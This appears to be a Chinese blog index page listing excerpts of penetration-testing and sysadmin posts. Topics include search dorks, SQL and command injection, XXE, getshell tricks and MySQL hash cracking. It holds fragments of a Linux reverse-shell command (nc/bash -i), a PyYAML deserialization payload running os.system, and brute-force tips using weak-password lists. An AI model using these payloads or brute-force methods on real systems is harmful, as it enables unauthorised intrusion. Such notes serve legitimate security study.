自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

原创 常用的搜索引擎语法

搜索关键字的返回的结果比较的时候这时候使用高级语法和通配符效果会比较容易找到我们想要的页面 常用高级语法: intitle 包含标题 intext 包含内容 filetype 文件类型 info 基本信息 site 指定网站 inurl 包含某个url...

2020-05-07 09:55:48 141 0

原创 php sprintf函数引起的sql注入

sprintf函数作用: sprintf() 函数把格式化的字符串写入变量中。 arg1、arg2、++ 参数将被插入到主字符串中的百分号(%)符号处。该函数是逐步执行的。在第一个 % 符号处,插入 arg1,在第二个 % 符号处,插入 arg2,依此类推。 注释:如果 % 符号多于 ar...

2020-03-11 18:31:15 176 0

原创 tomcat设置manager不限制密码错误次数

人家为了安全性都要限制密码最大错误尝试次数。我却要不限制,好吧,刚刚在测试Tomcat弱口令爆破的时候,扫描一会就被锁住了。查询一下资料Tomcat 默认最大尝试错误次数为5次。 超过5次会出现即使账号密码正确也登录不上的情况。 查询资料可以增加两个属性failureCount允许错误次数...

2020-01-03 15:06:03 236 2

原创 Django配置MEDIA_ROOT遇到的错误问题

今天加了一个markdown编辑器后,图片一直显示不出来 原本想把MEDIA_URL 和 STATIC_URL设置为一样 发现会报错。 于是修改为别的目录。上传上去以后,图片不显示,按照网上的答案增加 from django.conf.urls import url, include ...

2019-11-14 20:15:25 421 1

原创 oracle官网数据库使用迅雷下载方法

今天要去官网下载一个oracle的数据库,直接使用浏览器下载会一直卡主。 直接右键复制链接到迅雷去下载老是下载几KB的不知道什么文件 后面网上搜索知道下载的文件时登录后自动生成的。 所以想到的解决办法是。登录后点击下载,在复制这个下载url到迅雷中 果然下载的url和之前看到的...

2019-10-15 10:59:31 615 0

原创 Jinja2 Expected an expression, got 'end of print statement'

使用python-doc-Docx-Template报错 这个问题一般是语法错误。 但是我模板文件有好几十页。 使用一个快速的办法定位模板中错误的地方。 一段一段的删除运行,进行排除法。 最后发现 忘了输入变量名导致的 还有一个报错 genreport.py 1...

2019-10-14 10:21:48 649 0

原创 web测试中的短信问题

记录一下: 网站中手机号已经成为最重要也是最普遍的验证方式了。 所以关注短信的问题。 1.重置密码/短信验证码登录时验证码回显。 直接通过抓包,若验证码直接出现在返回包则直接可以跳过手机验证的阶段。 2.验证码没有限制发送频率。 利用这个来做短信炸弹, 3.发送手机短信验证时不需要输...

2019-08-17 23:57:49 123 0

原创 APP安全测试一般关注点

记录一下: 一、身份认证安全 1、暴力破解账号密码 没有设置错误最大尝试次数,没有验证码校验, 2、前端校验账号密码 修改返回包的返回值测试。 3、密码重置安全 利用短信验证码回传,验证码暴力破解等 二、业务接口调用 1.重放攻击 短信炸断,自定义短信内容,邮件查单 三、业务交易安全 窜依篡改金...

2019-08-11 22:16:03 197 0

原创 python bs4标签中含有标签string为空

用bs4解析的时候发现一个问题,标签中含有标签,string属性打印出来的内容为空。 如: 想要打印出p中的文本内容使用p.string打印结果为None. 查询资料: 获取tag内容有如下三种方法 soup.a.string soup.a.text soup.a.get_text(...

2019-06-30 16:07:14 968 0

原创 oracle数据库安装和打补丁的一些坑

今天安装了一下oracle数据库,发现确实很麻烦而且经常出现错误。就稍微简单记录一下错误 centos7 oracle12.2.0.1自动安装脚本 https://github.com/keepwalking86/oracle12c opatch没升级导致不能执行,opatch 版本下载...

2019-06-17 13:42:18 1185 0

原创 virtualbox虚拟机和宿主机互相访问

要实现宿主机能上网,能和虚拟机相互通信。 首先用桥接肯定是能实现的,但是一般网管会限制网络,一个人只能用一个静态ip地址。 使用NAT虚拟机能上网,可以ping通宿主机,但是宿主机ping不通虚拟机。 解决办法,通过端口转发的方式实现宿主机连接虚拟机。 测试 virtualbox中安装ka...

2019-05-22 14:02:51 1979 0

原创 mysql数据库密码破解方法

1.先找到到user.MYD文件。 所有的mysql系统用户的账号密码都存在这个文件里。 2.编辑器打开 这一串hash就是localhost@root的密码,注意破解的时候前面的*不要。 3.找个破解的网站破解 https://www.cmd5.com/ 这样忘记了密码都可以...

2019-05-08 09:38:50 3071 0

原创 pocsuite3 写poc

知道创宇的pocsuite3更新了。 https://github.com/knownsec/pocsuite3 一、安装 安装p'ython3.4以上 pip3 install pocsuite3 安装完成后 控制台输入pocsuite,如下结果就是安装成功了 二、...

2019-04-09 14:29:09 2244 0

原创 python 代码注入、命令执行函数和方法

一.内置危险函数 exec execfile eval 二.标准库危险模块 os subprocess commands 三.危险第三方库 Template(user_input) : 模板注入(SSTI)所产生的代码执行 subprocess32 四.反序列化 marshal PyYAML...

2019-04-08 13:42:56 1860 0

原创 后台getshell常用技巧

1.利用文件上传漏洞,找文件上传处想办法上传php文件。 一些网站在设置可以允许修改上传的文件类型则直接添加php 有时候会还有检测是否为php文件,可以通过文件名变形,大小写,双写等形式绕过,只要是黑名单的都比较好绕过 很多cms还有.hatccess文件禁止访问或者执行这个目录下...

2019-04-03 18:02:15 2512 0

原创 阿里云学生机服务器开启端口

记录一下: 今天在我的阿里云学生机上搭建了个mysql,已经设置好远程端口,并且防火墙已经开启3306端口了,但是怎么都连不上。 最后查了一下,需要再学生机的控制台里再开启端口才有 效果。 阿里云功能太多了,我找了好久都没找到我的主机在哪里,后面再别人的解答里发现,学生机属于轻服务器, 打...

2019-03-28 21:56:43 821 0

原创 cnnvd爬取漏洞信息

这段时间cnnvd的xml文件一直不更新,没办法只能自己去爬取。github上一搜索发现有挺多的类似的项目。scrapy框架编写的脚本 https://github.com/luweiwei1111/python_spider/tree/master/scrapy/cnnvd 说明: 1.本...

2019-03-14 19:07:35 1444 0

原创 esxi低版本导出的ova导入workstations报错

记录一下。 esxi5.1版本导出的ova导入workstations14时报错。 首先报错:规范一致性错误 这个直接重试就可以了。 然后报错Invalid target disk adapter type:pvscsi 这个低版本导入高版本会出错,直接把ova文件解压 然后修...

2019-02-28 17:44:43 699 0

原创 几种Linux下反弹shell的方法总结

在渗透测试过程中我们需要把测试目标的shell反弹到我们的主机中,方便测试。比如在测试到命令注入时,可以反弹shell进行进一步测试。 一、nc和bash 在我们的主机上执行 nc -lvp port 表示显示执行过程监听端口 在目标主机上执行 bash -i >&a...

2019-02-14 17:42:20 419 0

原创 pyyaml反序列化漏洞

pyyaml在解析含有!!开头的数据会强制进行类型转换成字符串格式。 测试 import yaml yaml.load('!!python/object/apply:os.system ["date"]')   结果 poc还可以 !!p...

2019-02-14 14:05:38 275 0

原创 解决python Markdown模块乱码

有个需求需要把markdown转成html模块,查询了一下刚好有这个模块 安装 pip install amrkdown 安装完成直接转换并保存为html时,发现出现中文乱码的情况 用编辑器打开发现是缺少utf8编码 所以只需要在头增加一行<meta http-equ...

2019-01-22 18:32:00 946 1

原创 docker ubuntu REST API

最近需要使用docker api。简单记录一下 一、安装配置 测试机器:ubuntu16.04 配置文件路径查询 systemctl show --property=FragmentPath docker  配置文件 sudo vim  /lib/systemd/system/dock...

2019-01-15 17:09:50 307 0

原创 docker Starting MySQL database server mysqld fail解决办法

今天有一个ubuntu+mysql的测试环境,在容器重启的时候mysql启动失败,导致docker启动失败。 首先查看docker日志 docker logs 8a16 发现有如下报错:  * Stopping MySQL database server mysqld    ...don...

2018-12-18 18:28:27 2079 0

原创 2018弱密码TOP 100

MARK:留着爆破测试 弱口令使用 123456 password 123456789 12345678 12345 111111 1234567 sunshine qwerty iloveyou princess admin welcome 666666 abc123 football 12...

2018-12-17 13:24:15 4205 0

原创 解决redhat vmware安装后鼠标不能使用问题

今天VMware搭建一个redhat发现鼠标不能使用,需要设置成PS2模式才能使用。 网上好多说法都不是很靠谱,最终找到一个靠谱解决的办法了,记录一下。 解决办法: 1、将启动模式设置为文本模式 看到操作系统列表后,按e进入编辑模式,移动光标到以kernel开头的那一行,再次键入e,这时会...

2018-12-11 09:52:46 2546 1

原创 命令注入

命令注入是一种常见的漏洞形态。一旦存在命令注入漏洞,攻击者就可以在目标系统执行任意命令。 测试脚本command.py: import os,subprocess import sys command = "ping -c 4 {}".format(sys.argv[1]...

2018-12-04 10:34:57 872 1

原创 insert、update和delete 注入方法

我们常见的注入都是select的查询注入比较多,但是SQL注入在参数没有检查和过滤的时候就会把恶意的数据插入数据库,从而造成SQL注入。 所有说除了查询之外,所有和数据库进行交互的请求都有可能造成注入。如:插入数据,更改数据,删除数据等,所以现在根据网上的技巧汇总一下insert、update和...

2018-11-28 20:23:53 2505 0

原创 web页面点击劫持

今天看到一个google的点击劫持漏洞获得7500美刀,连接如下 https://apapedulimu.click/clickjacking-on-google-myaccount-worth-7500/   点击劫持漏洞,利用UI重叠,视觉上的欺骗的漏洞,用于钓鱼。 了解点击劫持可以参...

2018-11-14 19:55:07 1174 0

原创 windows设置开机启动脚本修改配置文件和重启服务

有一台动态ip的测试机器,上面部署Nginx,然后每次重启机器后ip总会变动,需要改nginx.conf配置文件和重启nginx服务。 所以要解决这个问题,想到的解决方法: 1、python脚本来解决修改配置和重启服务 2、把python脚本制作成exe文件 3、exe脚本添加为开机启动 ...

2018-11-07 15:04:57 931 0

原创 Nginx通过二级目录反向代理不同端口的站点

今天在同一台测试机器上搭建了IIS的站点,Tomcat的站点,weblogic站点。现在有个需求这三个站点都要使用80端口进行访问,因为是在局域网里所以没有办法设置不同的域名作为server_name。后面想到可以用二级目录作为区分。 所以修改nginx.conf文件添加: upstr...

2018-11-02 10:57:09 4629 0

原创 IIS搭建php站点时访问会提示要登录

今天要整合一个漏洞环境把php和asp两种编程语言的站点整合到一起,在这个过程中遇到了一个问题。就是访问php文件的时候一直会提示需要输入用户名密码。 问题描述: 您未被授权查看该页    您不具备查看该目录或页面的权限,因为访问控制列表     (ACL)     对     Web    ...

2018-11-01 14:06:19 410 0

原创 weblogic环境搭建的遇到的问题记录

1.安装时JAVA_HOME路径无效 修改文件/home/weblogic/Oracle/Middleware/wlserver_10.3/common/bin/commEnv.sh文件 修改JAVA_HOME路径为  JAVA_HOME="/usr/lib/jvm/java-1.7...

2018-10-08 21:39:49 195 0

原创 CNVD原创漏洞证书总结

之前打算申请个CNVD的原创漏洞证书。经过这一个多月的时间证书下来了,现在简单总结一下。 原创漏洞审核和处理流程参考此链接:http://www.cnvd.org.cn/webinfo/show/3933 然后我就说说我提交过两个后台的文件上传漏洞 7.26提交-7.27二审通过,验证通过-...

2018-09-12 10:51:41 12868 8

原创 cms后台利用更新模块压缩包getshell

最近在找文件上传漏洞比较多。现在发现比较难找了,一是文件校验比前几年的更加严格了,黑名单还可以想办法绕过,白名单就相对困难了。 最近发现一个getshell的方法,原理是利用文件更新上传带有shell的压缩包。 https://github.com/idreamsoft/iCMS/issues...

2018-09-07 09:45:16 471 0

原创 python多进程爬虫解决进程挂掉问题

这几天写了个爬虫,爬取的数据比较多。一直挂在服务器上跑,后面发现启动十个进程总会运行着某几个进程挂掉,导致数据采集工作比较延后。 后面重新改进了一下,从日志中读取当前进程断点,继续爬取。 用了一个笨方法解决进程挂掉的问题。就是每半个小时关闭所有进程,重新从断点开始,当然各位有好的方法可以留言告...

2018-09-04 16:51:16 2181 0

原创 mysql替换字符串技巧

今天整理一下数据库的表,发现有好些地方需要替换,格式是固定的但是字符是变化的。 如: 红框中  漏洞类型:XXX弱点描述,是需要删除的。中间的字符是变化的,此时可以使用locate、substring和replace三个方法结合就可以成功清除掉冗余的字符。 1、截取字符串 subst...

2018-08-17 14:08:29 8441 1

原创 XXE payload

一、漏洞原理 当xml可以控制,并且后端没有过滤时就存在XXE漏洞。xml解析是引用外部实体。 二、漏洞测试 平时burp 抓包 可以在请求头添加  Content-type:application/xml 并添加 xml语句如果报错 或执行则有可能存在xxe漏洞,不断根据response ...

2018-08-16 15:37:29 2790 0

原创 账号安全测试总结

总结一下会出现账号安全的地方。 一、账号密码直接暴露在互联网上 1、关注是否把账号信息上传到github上,如数据库信息、邮件配置信息、SVN、数据库备份信息等。 二、无限制登录任意账号 1、不设置最多登录错误次数,可以暴力破解的 2、没有验证码的 3、登录存在sql注入,可以使用万能...

2018-08-12 22:27:36 355 0

原创 越权访问漏洞总结

一、平行越权 攻击者请求操作(增删改查)某条数据时,web应用程序没有判断该条数据的所属人,或者在判断数据所属人时直接从用户提交的表单参数中获取,例如用户id等,导致攻击者可以自行修改参数,操作获取不属于自己的数据。 测试方法:在发送请求时观察请求参数,尝试修改用户id或者其他参数验证是否能查...

2018-07-28 09:56:39 7398 1

原创 记录lxml.etree.XMLSyntaxError问题

这几天一直在重复写报告,于是和同事写了一个根据模板自动写报告的工具。主要使用Python-docx模块,在调试的过程中发现插入某些数据会报错:lxml.etree.XMLSyntaxError直接百度各种说法都有,于是观察插入的数据发现含有特殊字符&、<、&g...

2018-06-23 23:45:32 4477 0

提示
确定要删除当前文章?
取消 删除